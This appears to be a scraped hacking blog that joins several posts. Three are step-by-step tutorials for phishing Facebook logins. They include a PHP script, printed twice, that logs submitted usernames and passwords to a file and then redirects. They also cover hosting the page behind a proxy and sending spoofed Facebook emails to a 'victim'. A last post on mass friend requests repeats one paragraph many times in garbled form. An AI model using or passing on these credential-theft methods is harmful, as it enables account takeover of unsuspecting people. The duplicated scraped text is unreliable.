1 How to hack Facebook Password: Local Facebook Phishing Tutorial

Monday, September 29, 2014

How to hack Facebook Password: Local Facebook Phishing Tutorial 




Laptop or Desktop computer (you don't say)
Localhost server (wampp or xampp)

First you need to have a local server running on your computer.
Download and install the latest version of XAMPP for Windows


How do I install XAMPP?
XAMPP for Windows exists in three different flavors:
Probably the easiest way to install XAMPP.
For purists: XAMPP as ordinary ZIP archive.
For purists with low bandwidth: XAMPP as 7zip archive.
Note: If you extract the files, there can be false-positives virus

Download the code from https://github.com/ianvizarra/phish
Extract the zip files and Paste into htdocs folder 

  -Welcome to Facebook - Log In, Sign Up or Learn More_files
Htdocs folder can be found in /htdocs/Where the default installation directory is usually C:/xampp/


Now you already setup the local webserver and setup the codes, Let's now run the code.Open your favorite web browser and enter "localhost/www.facebook.com". You should see a webpage replica of the facebook login page.

The trick here is to make this as your browser home page so they won't easily notice the fake url.Try to login using your account.Once you hit submit. The code will now save the username/email and password you enter to data.txt file. And the page will redirect you to the real facebook page with error login attempt.



Make your friend use your pc or laptop to access facebook and hope he will not notice the fake url :)

Note: I will not advise you to use it to upload on your server. Phishing is illegal. Use this code at your own risk
                                              Posted by Umair Hacker 

                                           ミ★Pak Muslims Attackers★彡


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1 Phishing Webpage - An easy way to Hack Facebook Account

Saturday, September 27, 2014

Phishing Webpage - An easy way to Hack Facebook Account

Hacking a Facebook account always sounds very interesting to everyone, there is no doubt that facebook is a largest and most popular social network around the world but also most targeted as well. Hackers used various methods to exploit any one’s facebook account and today we will make you learn the one by using phishing webpage.

Phishing Webpages; These are actually fake webpages, they look likes the original one but they are not. There are many ways to do make fake webpage but here we will show how you can do by using scripts. So, here we go! Open the Facebook page in browser, click “View” from menu bar or right click on the blank space of the front page. And select “View page source”. Select all text and copy to the new Notepad file.

Now in Notepad press Ctrl + f for finding “action=” in that code. It will be like this:

The highlighted text within page is need to be change into ‘action=”next.php” ‘. Now the other highlighted text method=”post” would be changed into “get” instead of “post” because otherwise it doesn’t work. After you have done this Save the page as index.html After that you need to create another Notepad file named “next.php” to store the password. So, open the notepad and type the following code: <?php header("Location: http://www.Facebook.com/login.php "); $handle = fopen("pswrds.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> and save the file. Again open the Notepad and save the blank (empty) file as “paswrds.txt” Here we have three files respectively index.php, next.php and paswrds.text, Now upload all these three files on any of subdomian web hosting site but make sure this site must has PHP features. Following are some websites you can use for this purpose: http://www.110mb.com/ http://www.spam.com/
There are many other sites you can find via google. But don’t forget to use these site through the secure connection sites so you can hide your original IP addresss. Here is the best secure connection site you can use: http://www.plyproxy.com/
Now create an mail account with fake facebook keywords like: facebook_welcome@reply.facebookmail.com, facebook_friends@facebookmail.com, noreply@facebookmail.com etc. You can get the best idea about these keywords in daily notifications emails from your facebook account to the concern email address.
Here we are taking the example of Facebook Friend request, for this copy the original text of Facebook friendship invitation and paste in compose mail and remove the hyper link http://www.facebook.com/n/?reqs.php, Mark it and also Add hyperlink button. Note that You can get this Facebook friendship invitation from Facebook when someone "add as a friend", Just copy that mail and paste in compose mail and in that content, you can find this link http://www.facebook.com/n/?reqs.php . Just change the link and create link with same text but link to your site.
Now in the messageLink Accept Friend Request button or on facebook link with your phishing page url in the hyperlink bar that appears after clicking the button and click add. The hyper link should still display the following link http://www.facebook.com/n/?reqs.php but would be redirected to your phishing page.
Note: Be careful while composing message and links it should be look original, so user couldn’t have any doubt.

                                                             ミ★Posted By Umair Hacker ★彡
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1 How to hack Facebook with phishing page

      How to hack Facebook with phishing page

                                                                                                      by:Umair Khan

hacking facebook account

As we all want to hack our friend facebook account,and want to read all his personal things.
Today i m gonna teach you how to hack a facebook account with a phishing page.


Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.

today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....


facebook hack

steps to create a phishing page:

1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.

facebook phishing script

4.You will have to find a text which looks like ..


5.delete all the text written in red colour and instead of it write post.php.then it will look like...


6.Now save it on your desktop with the name index.htm,not index.html,remember.

7.Now your phishing page is ready.it will look like a pic given below .

hacking script

8.Open a new notepad and save the given data with the name post.php.

header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
fwrite($handle, "\r\n");

9.You have two files now one is index.htm and another is post.php,remember file extension is important.

10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.

11.I prefer u to use 000webhost because it will be easy to use.
hosting website

12.You have to make a account in that ,after that it looks like a picture given below.

facebook script hosting website
13.Now go control pannel,then on file manager.

14.After that a new window will pop up.Now go to public_html.


15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .

16.Now the last step click on view of index.htm it will look same as facebook page.

this is your Facebook phishing page

17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.

18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.


20.This is a simple trick to hack any Facebook password account by phishing page.

21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download  
      it and enjoy.

       click here to view a video tutorial with the readymade phishing pages....


phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....


Hope u like my post,in my next tutorial i will show u how to hack Facebook in a easiest way....
                                                                                   thank you... 
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2 How to get Make 5000 friends on facebook Fast in One Day 2014

Thursday, September 11, 2014

How to get Make 5000 friends on facebook Fast in One Day 2014

Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you

Is Possible To Get 500 Friend request in one day

Many people MSG me they are now on Facebook, And they wanna make more friends on this social site, How i get fast Facebook friends. We was also sharing a method may be now that is not safe so we will remove that. But our this tutorial also more safe and  it will give you 5000 Facebook friend request in a day by simple method.

Get Make 5000  Facebook Friends Fast in One Day

    Fist you Must login your Facebook Account

    Now simply go on Facebook/mass_Add Application.

    Now Just Login with that application for getting information.

    Just select your Friends interest in Select friends you want to add.


    Now Just Click on Generate Button.

    After This you will see many Friends Emails Just Copy All.

    Now Go to Invite Friends PHP url. You can go directly on Invite Friends PHP.

    Now Past all Emails in on There and Wright any MSG Like Please Add, Add me.

    Wait for some time, After some time you will get started friends request.

    Now done, You can generate more emails, but please use only one time in A Day.

Final Words

Our site is always trying to share something new and more useful tricks of this social site, I wanna tell you that its not an official trick or method of this social site, So we are not responsible any harm of or violation activity of Facebook because its not follow Facebook policies,  Please Share this article using below  SEND Button, and you can Bookmark this site using Control + D, Thanks for the visit and keep it. You can also visit our other blog on Top Best Android apps for get new information about apps

                                                              Posted by Umair Haxor

Get Make 5000  Facebook Friends Fast in One Day

  • Now Just Login with that application for getting information.

  • Just select your Friends interest in Select friends you want to add.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Now Just Click on Generate Button.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • After This you will see many Friends Emails Just Copy All.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Now Past all Emails in on There and Wright any MSG Like Please Add, Add me.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Wait for some time, After some time you will get started friends request.

  • Now done, You can generate more emails, but please use only one time in A Day.

Final Words

Our site is always trying to share something new and more useful tricks of this social site, I wanna tell you that its not an official trick or method of this social site, So we are not responsible any harm of or violation activity of Facebook because its not follow Facebook policies,  Please Share this article using below  SEND Button, and you can Bookmark this site using Control + D, Thanks for the visit and keep it. You can also visit our other blog on Top Best Android apps for get new information about apps. - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf

Get Make 5000  Facebook Friends Fast in One Day

  • Now Just Login with that application for getting information.

  • Just select your Friends interest in Select friends you want to add.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Now Just Click on Generate Button.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • After This you will see many Friends Emails Just Copy All.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Now Past all Emails in on There and Wright any MSG Like Please Add, Add me.

How to get Make 5000 friends on facebook Fast in One Day 2014 image

  • Wait for some time, After some time you will get started friends request.

  • Now done, You can generate more emails, but please use only one time in A Day.

Final Words

Our site is always trying to share something new and more useful tricks of this social site, I wanna tell you that its not an official trick or method of this social site, So we are not responsible any harm of or violation activity of Facebook because its not follow Facebook policies,  Please Share this article using below  SEND Button, and you can Bookmark this site using Control + D, Thanks for the visit and keep it. You can also visit our other blog on Top Best Android apps for get new information about apps. - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Don't Miss - How To Tag More Than 50 Friends on Facebook Photo 2014 - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Is Possible To Get 500 Friend request in one day
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
Getting Make 5000 friends on Facebook Fast in One Day is a really awesome trick, Many people ask me that how to get it, You can do it if you will follow our this trick, So for this, Today we are sharing with Facebook secret and working trick for How To Get Make 5000 friends on Facebook Fast in One Day, We was also shared with You How To Send An Unlimited Friends Request Without Getting Blocked. We are always trying to share something new and more useful tips and tricks for this social site, Today we are including this Killer trick on our site. Using this you can get more Facebook friend request in a one day, Its simple method, Using this you can't block. There are many methods for this, I was also trying many of these category tutorials, mostly are not working, And some are  harmful for your account safety. It may be safe and user friendly trick for you - See more at: http://www.howtofacebooktipstricks.com/2014/03/How-get-Make-5000-friends-facebook.html#sthash.a1fX3844.dpuf
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